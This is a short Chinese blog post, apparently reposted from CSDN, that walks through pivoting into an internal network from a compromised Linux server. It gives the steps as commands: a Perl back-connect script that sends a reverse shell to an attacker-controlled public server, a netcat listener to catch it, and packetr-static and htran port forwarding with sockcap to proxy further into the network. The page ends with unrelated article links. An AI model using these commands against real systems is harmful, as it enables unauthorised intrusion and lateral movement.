博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Linux下的内网反弹实例
阅读量:2441 次
发布时间:2019-05-10

本文共 775 字,大约阅读时间需要 2 分钟。

环境:

被攻陷的Linux主机(拿到root权限)-----模拟为我内网的一台Linux服务器 192.168.0.105

hack的操作用机-----我的电脑 192.168.1.101

反弹到公网的服务器-----我自己的公网服务器 61.160.2xx.xxx

渗透测试用的windows测试机   192.168.1.109

工具:

packetr-static   Linux下的

htran.exe windows下的

sockcap 用作代理进入内网渗透的利器

过程:

1.我模拟下极度苛刻的情况下的环境,该攻陷的Linux服务器对外不开放22,只存在web端口80,那么我们必须得反弹shell到公网的机器上,这点我虚拟机里面没 这个环境,我就直接说下简要的

上传back.pl文件到linux下的tmp目录下,执行

perl /tmp/back.pl xxx.xxx.xxx.xxx 端口

在公网的服务器上,运行nc执行

nc -l -v -p 端口(跟上面的一样)

现在我弹2个窗口回来,一个开代理,一个转发数据

把packetr-static传上去,执行

./packetr-static -s 1988

一个窗口转发数据,执行

./packetr-static -slave 61.160.20x.xxx 123 127.0.0.1 1988

2.在windows公网端执行,

htran.exe -p -listen 123 1988

3.配置sockcap

4.运行代理程序进入内网

 

本文来自CSDN博客,转载请标明出处:file:///C:/Documents%20and%20Settings/Administrator/桌面/Linux下的内网反弹实例%20-%20linkboy的BLOG%20-%20CSDN博客.mht

你可能感兴趣的文章
Logback-spring.xml日志配置
查看>>
[Vue warn]: Property or method "name" is not defined on the instance but referenced during render
查看>>
ts:json串转换成数组
查看>>
String、StringBuffer和StringBuilder的区别
查看>>
java——职责链模式
查看>>
java_选择类排序——简单选择排序
查看>>
java_中介者模式
查看>>
java_备忘录模式
查看>>
多线程——背景了解
查看>>
power designer使Comment与Name相同.txt
查看>>
学习Spring 开发指南------基础语义
查看>>
IE下的图片空隙间距BUG和解决办法
查看>>
[pb]从excel导入数据到datawindow
查看>>
CSS Padding in Outlook 2007 and 2010
查看>>
有关内存的思考题
查看>>
What is the difference between gross sales and revenue?
查看>>
Dreamweaver默认打开后缀名为ftl的文件时
查看>>
LNMP一键安装
查看>>
几个分析函数的比较
查看>>
主流算法:
查看>>